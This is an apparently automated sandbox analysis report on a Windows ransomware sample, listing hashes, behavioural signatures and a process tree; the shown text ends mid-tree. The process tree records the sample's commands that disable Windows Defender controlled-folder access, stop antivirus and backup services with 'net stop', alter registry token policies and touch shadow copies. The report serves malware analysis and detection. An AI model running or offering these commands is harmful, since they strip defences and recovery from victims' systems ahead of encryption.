Overview
overview
10Static
static
1058bfb9fa88...1f.exe
windows7-x64
58bfb9fa88...1f.exe
windows10-2004-x64
105d40615701...3d.exe
windows7-x64
105d40615701...3d.exe
windows10-2004-x64
10ae66e009e1...75.exe
windows7-x64
ae66e009e1...75.exe
windows10-2004-x64
c460fc0d4f...50.exe
windows7-x64
c460fc0d4f...50.exe
windows10-2004-x64
10Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
14-12-2024 09:32
Behavioral task
behavioral1
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win10v2004-20241007-en
General
-
Target
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
-
Size
91KB
-
MD5
be60e389a0108b2871dff12dfbb542ac
-
SHA1
14b4e0bfac64ec0f837f84ab1780ca7ced8d670d
-
SHA256
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d
-
SHA512
6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641
-
SSDEEP
1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI
Malware Config
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (64) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Deletes itself 1 IoCs
pid Process 3260 cmd.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
pid Process 2736 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 raw.githubusercontent.com 5 raw.githubusercontent.com -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2484 sc.exe 2072 sc.exe 2296 sc.exe 2144 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fsutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3120 cmd.exe 3296 PING.EXE -
Interacts with shadow copies 3 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 628 vssadmin.exe 324 vssadmin.exe 2492 vssadmin.exe 884 vssadmin.exe 2208 vssadmin.exe 2272 vssadmin.exe 3008 vssadmin.exe 1800 vssadmin.exe 1956 vssadmin.exe 2256 vssadmin.exe 1628 vssadmin.exe 1880 vssadmin.exe 2192 vssadmin.exe 1088 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 2388 taskkill.exe 2076 taskkill.exe 2212 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1920 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3296 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Token: SeDebugPrivilege 2212 taskkill.exe Token: SeDebugPrivilege 2388 taskkill.exe Token: SeDebugPrivilege 2076 taskkill.exe Token: SeDebugPrivilege 2736 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2508 wrote to memory of 2736 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 30 PID 2508 wrote to memory of 2736 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 30 PID 2508 wrote to memory of 2736 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 30 PID 2508 wrote to memory of 2736 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 30 PID 2508 wrote to memory of 2836 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 32 PID 2508 wrote to memory of 2836 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 32 PID 2508 wrote to memory of 2836 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 32 PID 2508 wrote to memory of 2836 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 32 PID 2508 wrote to memory of 2868 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 33 PID 2508 wrote to memory of 2868 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 33 PID 2508 wrote to memory of 2868 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 33 PID 2508 wrote to memory of 2868 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 33 PID 2508 wrote to memory of 2760 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 35 PID 2508 wrote to memory of 2760 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 35 PID 2508 wrote to memory of 2760 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 35 PID 2508 wrote to memory of 2760 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 35 PID 2508 wrote to memory of 2732 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 36 PID 2508 wrote to memory of 2732 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 36 PID 2508 wrote to memory of 2732 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 36 PID 2508 wrote to memory of 2732 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 36 PID 2508 wrote to memory of 2972 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 37 PID 2508 wrote to memory of 2972 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 37 PID 2508 wrote to memory of 2972 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 37 PID 2508 wrote to memory of 2972 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 37 PID 2508 wrote to memory of 2740 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 38 PID 2508 wrote to memory of 2740 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 38 PID 2508 wrote to memory of 2740 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 38 PID 2508 wrote to memory of 2740 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 38 PID 2508 wrote to memory of 2804 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 40 PID 2508 wrote to memory of 2804 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 40 PID 2508 wrote to memory of 2804 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 40 PID 2508 wrote to memory of 2804 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 40 PID 2508 wrote to memory of 2968 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 41 PID 2508 wrote to memory of 2968 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 41 PID 2508 wrote to memory of 2968 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 41 PID 2508 wrote to memory of 2968 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 41 PID 2508 wrote to memory of 2808 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 42 PID 2508 wrote to memory of 2808 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 42 PID 2508 wrote to memory of 2808 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 42 PID 2508 wrote to memory of 2808 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 42 PID 2508 wrote to memory of 2768 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 43 PID 2508 wrote to memory of 2768 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 43 PID 2508 wrote to memory of 2768 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 43 PID 2508 wrote to memory of 2768 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 43 PID 2508 wrote to memory of 1044 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 44 PID 2508 wrote to memory of 1044 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 44 PID 2508 wrote to memory of 1044 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 44 PID 2508 wrote to memory of 1044 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 44 PID 2508 wrote to memory of 2816 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 45 PID 2508 wrote to memory of 2816 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 45 PID 2508 wrote to memory of 2816 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 45 PID 2508 wrote to memory of 2816 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 45 PID 2508 wrote to memory of 2744 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 50 PID 2508 wrote to memory of 2744 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 50 PID 2508 wrote to memory of 2744 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 50 PID 2508 wrote to memory of 2744 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 50 PID 2508 wrote to memory of 2776 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 51 PID 2508 wrote to memory of 2776 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 51 PID 2508 wrote to memory of 2776 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 51 PID 2508 wrote to memory of 2776 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 51 PID 2508 wrote to memory of 2660 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 52 PID 2508 wrote to memory of 2660 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 52 PID 2508 wrote to memory of 2660 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 52 PID 2508 wrote to memory of 2660 2508 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 52 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"1⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
- System Location Discovery: System Language Discovery
PID:2836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
- System Location Discovery: System Language Discovery
PID:3040
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- System Location Discovery: System Language Discovery
PID:2868 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
- System Location Discovery: System Language Discovery
PID:2940
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵PID:2760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:2152
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:2732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
- System Location Discovery: System Language Discovery
PID:3132
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- System Location Discovery: System Language Discovery
PID:2972 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:940
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
- System Location Discovery: System Language Discovery
PID:2740 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
- System Location Discovery: System Language Discovery
PID:1100
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵
- System Location Discovery: System Language Discovery
PID:2804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
- System Location Discovery: System Language Discovery
PID:1252
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:2968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
- System Location Discovery: System Language Discovery
PID:2380
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵
- System Location Discovery: System Language Discovery
PID:2808 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
- System Location Discovery: System Language Discovery
PID:1512
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
- System Location Discovery: System Language Discovery
PID:2768 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:2428
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵
- System Location Discovery: System Language Discovery
PID:1044 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
- System Location Discovery: System Language Discovery
PID:1092
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:2816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
- System Location Discovery: System Language Discovery
PID:1812
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
- System Location Discovery: System Language Discovery
PID:2744 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:2392
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵
- System Location Discovery: System Language Discovery
PID:2776 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
- System Location Discovery: System Language Discovery
PID:1972
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵
- System Location Discovery: System Language Discovery
PID:2660 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
- System Location Discovery: System Language Discovery
PID:1924
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:2884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
